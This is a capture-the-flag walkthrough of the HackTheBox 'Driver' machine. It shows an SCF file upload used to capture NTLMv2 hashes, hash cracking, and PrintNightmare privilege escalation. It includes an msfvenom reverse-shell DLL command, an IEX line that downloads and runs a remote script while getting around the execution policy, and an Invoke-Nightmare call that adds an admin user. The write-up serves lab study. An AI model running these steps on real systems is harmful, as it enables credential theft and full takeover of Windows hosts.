# HackTheBox-Driver ## NMAP ```bash PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ## PORT 139/445 (SMB) Checking smb share through anonymous login it seems we don't have access it to it so let's move on to web server ## PORT 80 (HTTP) On visiting web server , it's going to ask credentials so let's try `admin;admin` to see if this works And it did it ,so let's see what we have here It's running on php , I checked to include index file with `php` extension and this loaded the page so this page is written on php so just some basic enumeration here. There are only two pages here , the other page is about uploading a firmware for the printer I tried uploading something but it doesn't seem that I can access that file from anywhere so I ran `gobuster` and it also didn't found anyhing interesting Now I kept thinking but nothing was coming to my mind until I focused on these lines " upload the respective firmware update to our file share" , so maybe the file we upload here is going to smb share , so here I learned a new attack which is known as SCF File attack `Shell Command File`. So we need to create a `.scf` file , it will look like this Now we will have to upload this file and at the same time run `responder` to catch NTMLv2 hash ```bash responder -I tun0 -rdw -v ``` Just copy any of the hash , they all are the same, the only different is the time difference (in seconds) and save the hash in a file , and crack it with `hashcat` Now to verify if we have valid creds , we can use `crackmapexec` to verify it on smb We only have read access here so we can't get a shell using `smbexec` or `psexec`. Since WinRM is open (port 5985) , we can check if we can get a shell with that It's showing us the status "pwned" meaning that we can get a shell ## Privilege Escalation (Print Nightmare Python) Assuming from the web page that there's a print spooler service running , we can test if we can exploit `PrintNightmare` , now this requires some setup as we need to clone the specifc impacket repo https://github.com/cube0x0/CVE-2021-1675 After cloning it we would then have to run `python3 ./setup.py install` and copy the contents of `CVE-2021-1675.py` , start the smb server using `service smbd restart` and generate a dll reverse shell ```bash msfvenom x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll ``` Make sure that you have made read access to other group for this file Now to lauch the script and catch the shell ## Print Nightmare (Powershell) We can achieve SYSTEM on this machine through powershell as well , without the need of setting up a smb server So we'll use this POC for the pring nightmare exploit https://github.com/calebstewart/CVE-2021-1675 After transferring it to target machine , let's import the ps1 file. But if we try to import the script , it's going to show us an error "running scripts is disabled on this system" So to bypass this , we need to download the file using `IEX` ```powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1'); ``` An advantage of downloading it this way is that not only it downloads the file but it will actually import the script so we don't have to import it manually ```powershell Invoke-Nightmare -NewUser "USER" -NewPassword "PASS" ``` We can see that the user has been created And we can then just switch to this user by logging in with `evil-winrm` ## References - https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/ - https://www.jaacostan.com/2021/07/printnightmare-cve-2021-1675-poc.html - https://github.com/cube0x0/CVE-2021-1675 - https://github.com/calebstewart/CVE-2021-1675 - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70